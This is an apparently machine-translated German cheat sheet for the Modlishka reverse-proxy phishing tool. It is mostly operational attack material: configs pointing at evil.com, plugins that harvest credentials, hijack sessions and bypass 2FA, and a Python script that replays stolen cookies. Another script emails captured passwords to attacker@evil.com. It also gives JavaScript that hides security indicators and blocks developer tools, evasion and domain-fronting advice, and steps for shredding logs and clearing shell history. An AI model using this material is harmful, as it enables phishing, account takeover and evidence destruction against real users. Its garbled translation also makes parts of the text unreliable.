Modlishka Reverse Proxy Phishing Tool Cheat Sheet¶
Überblick¶
Modlishka ist ein fortschrittliches Reverse Proxy Phishing-Tool, das von drk1wi entwickelt wurde, das anspruchsvolle Phishing-Angriffe mit 2FA Bypass-Funktionen und Session-Hijacking ermöglicht. Es handelt sich um eine transparente Proxy zwischen dem Opfer und der legitimen Website, die Erfassung von Anmeldeinformationen und Sitzungstoken in Echtzeit.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation¶
Vorkompilierte Binäre¶
```bash
Download latest release for Linux¶
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-linux-amd64 chmod +x Modlishka-linux-amd64
Download for Windows¶
Download Modlishka-windows-amd64.exe from GitHub releases¶
Download for macOS¶
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-darwin-amd64 chmod +x Modlishka-darwin-amd64 ```_
Aufbau von Source¶
```bash
Install Go (version 1.19+)¶
git clone https://github.com/drk1wi/Modlishka.git cd Modlishka make
Cross-compile for different platforms¶
make build-all ```_
Docker Installation¶
```bash
Build Docker image¶
git clone https://github.com/drk1wi/Modlishka.git cd Modlishka docker build -t modlishka .
Run Modlishka in Docker¶
docker run -it -p 443:443 -p 80:80 modlishka ```_
Basisnutzung¶
Kommandozeilenoptionen¶
```bash
Basic usage¶
./Modlishka -target https://example.com -domain evil.com
With SSL certificate¶
./Modlishka -target https://example.com -domain evil.com -cert /path/to/cert.crt -certKey /path/to/key.key
With configuration file¶
./Modlishka -config config.json
Debug mode¶
./Modlishka -target https://example.com -domain evil.com -debug ```_
Datei konfigurieren¶
json
\\\\{
"proxyDomain": "evil.com",
"listeningAddress": "0.0.0.0",
"target": "https://example.com",
"targetRes": "",
"targetRules": "PC9oZWFkPg==",
"terminateTriggers": "",
"terminateUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"jsRules": "",
"forceHTTPS": false,
"forceHTTP": false,
"dynamicMode": false,
"debug": false,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
\\\\}_
Befehlsnummer¶
Grundparameter¶
| Parameter | Description |
|---|---|
-target |
Target website URL |
-domain |
Phishing domain |
-listeningAddress |
Listening IP address |
-cert |
SSL certificate file |
-certKey |
SSL private key file |
-config |
Configuration file path |
Erweiterte Parameter¶
| Parameter | Description |
|---|---|
-debug |
Enable debug mode |
-log |
Log file path |
-plugins |
Plugin configuration |
-forceHTTPS |
Force HTTPS redirects |
-dynamicMode |
Enable dynamic mode |
-disableSecurity |
Disable security headers |
Erweiterte Konfiguration¶
SSL/TLS Setup¶
```bash
Generate self-signed certificate¶
openssl req -newkey rsa:4096 -nodes -keyout modlishka.key -x509 -days 365 -out modlishka.crt
Use Let's Encrypt certificate¶
certbot certonly --standalone -d evil.com ./Modlishka -target https://example.com -domain evil.com -cert /etc/letsencrypt/live/evil.com/fullchain.pem -certKey /etc/letsencrypt/live/evil.com/privkey.pem ```_
Konfiguration der Zielregeln¶
json
\\\\{
"targetRules": "base64_encoded_rules",
"jsRules": "base64_encoded_js_rules"
\\\\}_
Inhaltsänderung Regeln¶
```javascript // JavaScript rules for content modification // Base64 encode these rules for targetRules parameter
// Hide security warnings document.querySelectorAll('.security-warning').forEach(el => el.style.display = 'none');
// Modify page title document.title = 'Legitimate Service Login';
// Remove security indicators document.querySelectorAll('.ssl-indicator').forEach(el => el.remove());
// Inject custom CSS var style = document.createElement('style'); style.textContent = '.phishing-indicator \\{ display: none !important; \\}'; document.head.appendChild(style); ```_
Plugin Konfiguration¶
json
\\\\{
"plugins": \\\\{
"credHarvester": \\\\{
"enabled": true,
"params": \\\\{
"log": "credentials.log",
"format": "json"
\\\\}
\\\\},
"sessionHijacker": \\\\{
"enabled": true,
"params": \\\\{
"cookieLog": "cookies.log"
\\\\}
\\\\},
"2faBypass": \\\\{
"enabled": true,
"params": \\\\{
"tokenLog": "tokens.log"
\\\\}
\\\\}
\\\\}
\\\\}_
2FA Bypass Techniken¶
Sitzung Token Capture¶
```bash
Modlishka automatically captures session tokens¶
Monitor the log file for captured sessions¶
tail -f requests.log|grep -i "session|token|cookie"
Extract session cookies¶
grep -o '"cookies":[.*]' requests.log|jq '.cookies' ```_
Echtzeit Session Hijacking¶
```python
Python script to monitor and use captured sessions¶
import json import requests import time
def monitor_sessions(log_file): with open(log_file, 'r') as f: f.seek(0, 2) # Go to end of file
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'cookies' in data:
cookies = data['cookies']
# Use captured cookies for session hijacking
hijack_session(cookies)
except:
pass
time.sleep(1)
def hijack_session(cookies): session = requests.Session() for cookie in cookies: session.cookies.set(cookie['name'], cookie['value'])
# Access protected resources
response = session.get('https://example.com/dashboard')
print(f"Session hijack successful: \\\\{response.status_code\\\\}")
```_
TOTP/SMS Bypass¶
```bash
Modlishka captures 2FA tokens in real-time¶
The victim enters the 2FA code on the phishing site¶
Modlishka forwards it to the legitimate site¶
Session is established and captured¶
Monitor 2FA bypass attempts¶
grep -i "2fa|totp|sms|verification" requests.log ```_
Evasion Techniken¶
Domain Fronting¶
```bash
Use CDN for domain fronting¶
./Modlishka -target https://example.com -domain cdn.cloudflare.com -hostHeader evil.com
Configure DNS for domain fronting¶
Point evil.com to CDN IP¶
Configure CDN to forward to Modlishka server¶
```_
Verkehrsobfukation¶
json
\\\\{
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"customHeaders": \\\\{
"X-Forwarded-For": "192.168.1.100",
"X-Real-IP": "192.168.1.100",
"Accept-Language": "en-US,en;q=0.9"
\\\\}
\\\\}_
Anti-Detektionsmaßnahmen¶
```javascript // Inject anti-detection JavaScript // Disable developer tools document.addEventListener('keydown', function(e) \\{ if (e.key === 'F12'||(e.ctrlKey && e.shiftKey && e.key === 'I')) \\{ e.preventDefault(); return false; \\} \\});
// Disable right-click document.addEventListener('contextmenu', function(e) \\{ e.preventDefault(); return false; \\});
// Clear console setInterval(function() \\{ console.clear(); \\}, 1000); ```_
Geolocation Filtering¶
```python
Python script for geolocation-based filtering¶
import geoip2.database from flask import Flask, request, abort
app = Flask(name) reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
ALLOWED_COUNTRIES = ['US', 'CA', 'GB']
@app.before_request def check_geolocation(): client_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
try:
response = reader.city(client_ip)
country_code = response.country.iso_code
if country_code not in ALLOWED_COUNTRIES:
abort(404)
except:
# If geolocation fails, allow access
pass
```_
Credential Harvesting¶
Analyse der Ergebnisse¶
```bash
Extract credentials from logs¶
grep -o '"username":"[^"]"' requests.log|cut -d'"' -f4|sort -u grep -o '"password":"[^"]"' requests.log|cut -d'"' -f4
Extract email addresses¶
grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]\\{2,\\}' requests.log|sort -u
Extract session tokens¶
grep -o '"sessionToken":"[^"]*"' requests.log|cut -d'"' -f4 ```_
Echtzeitüberwachung¶
```python
Real-time credential monitoring¶
import json import time import smtplib from email.mime.text import MIMEText
def monitor_credentials(log_file): with open(log_file, 'r') as f: f.seek(0, 2)
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
send_notification(data['username'], data['password'])
except:
pass
time.sleep(1)
def send_notification(username, password): msg = MIMEText(f"New credentials captured:\nUsername: \\{username\\}\nPassword: \\{password\\}") msg['Subject'] = 'Modlishka - Credentials Captured' msg['From'] = 'modlishka@evil.com' msg['To'] = 'attacker@evil.com'
server = smtplib.SMTP('localhost')
server.send_message(msg)
server.quit()
```_
Datenbankspeicher¶
```python
Store credentials in database¶
import sqlite3 import json
def store_credentials(log_file, db_file): conn = sqlite3.connect(db_file) cursor = conn.cursor()
# Create table
cursor.execute('''
CREATE TABLE IF NOT EXISTS credentials (
id INTEGER PRIMARY KEY,
timestamp TEXT,
username TEXT,
password TEXT,
ip_address TEXT,
user_agent TEXT
)
''')
with open(log_file, 'r') as f:
for line in f:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
cursor.execute('''
INSERT INTO credentials
(timestamp, username, password, ip_address, user_agent)
VALUES (?, ?, ?, ?, ?)
''', (
data.get('timestamp'),
data.get('username'),
data.get('password'),
data.get('ip'),
data.get('userAgent')
))
except:
pass
conn.commit()
conn.close()
```_
Operationelle Sicherheit¶
Infrastrukturaufbau¶
```bash
Use VPS with clean IP reputation¶
Implement proper DNS configuration¶
Use legitimate SSL certificates¶
Set up redirectors and load balancers¶
```_
Verwaltung¶
```bash
Rotate logs to prevent disk space issues¶
logrotate -f /etc/logrotate.d/modlishka
Secure log storage¶
chmod 600 requests.log chown root:root requests.log
Remote log shipping¶
rsync -avz requests.log user@backup-server:/logs/ ```_
Reinigungsverfahren¶
```bash
Secure deletion of logs¶
shred -vfz -n 3 requests.log shred -vfz -n 3 credentials.log
Clear system logs¶
journalctl --vacuum-time=1d
Clear bash history¶
history -c rm ~/.bash_history ```_
Fehlerbehebung¶
Verbindungsprobleme¶
```bash
Test target connectivity¶
curl -I https://example.com
Check DNS resolution¶
dig evil.com nslookup evil.com
Test SSL certificate¶
openssl s_client -connect evil.com:443 -servername evil.com ```_
SSL/TLS Ausgaben¶
```bash
Verify certificate¶
openssl x509 -in modlishka.crt -text -noout
Check certificate chain¶
openssl verify -CAfile ca.crt modlishka.crt
Test SSL configuration¶
sslscan evil.com:443 ```_
Leistungsfragen¶
```bash
Monitor resource usage¶
top -p $(pgrep Modlishka)
Check network connections¶
netstat -tulpn|grep Modlishka
Monitor disk usage¶
df -h du -sh requests.log ```_
Debug Mode¶
```bash
Enable debug logging¶
./Modlishka -target https://example.com -domain evil.com -debug
Analyze debug output¶
tail -f debug.log|grep -i error
Check for common issues¶
grep -i "certificate|ssl|tls|dns" debug.log ```_
Detektive Evasion¶
Netzwerkebene¶
- Verwenden Sie legitime Domains und Zertifikate
- Implementierung der richtigen DNS-Konfiguration
- Verwenden Sie CDN und Domain Fronting
- Vary Verkehrsmuster und Timing
- Implementierung der richtigen Fehlerbehandlung
Anwendungsebene¶
- Mimic legitimes Website-Verhalten
- Verwenden Sie richtige HTTP-Header und Antworten
- Implementierung von Anti-Bot-Maßnahmen
- Verwenden Sie legitime Benutzer
- Griff Rand Fälle anmutig
Verhalten¶
- Grenzangriffsdauer
- Zielspezifische Benutzer/Organisationen
- Social Engineering für Erstzugriff nutzen
- Durchführung richtiger Reinigungsverfahren
- Monitor für Erkennungsindikatoren
Ressourcen¶
- Modlishka GitHub Repository
- Modlishka Dokumentation
- [drk1wi Blog](LINK_5_
- Reverse Proxy Phishing Techniques
- [2FA Bypass Research](LINK_5_
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Modlishka. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *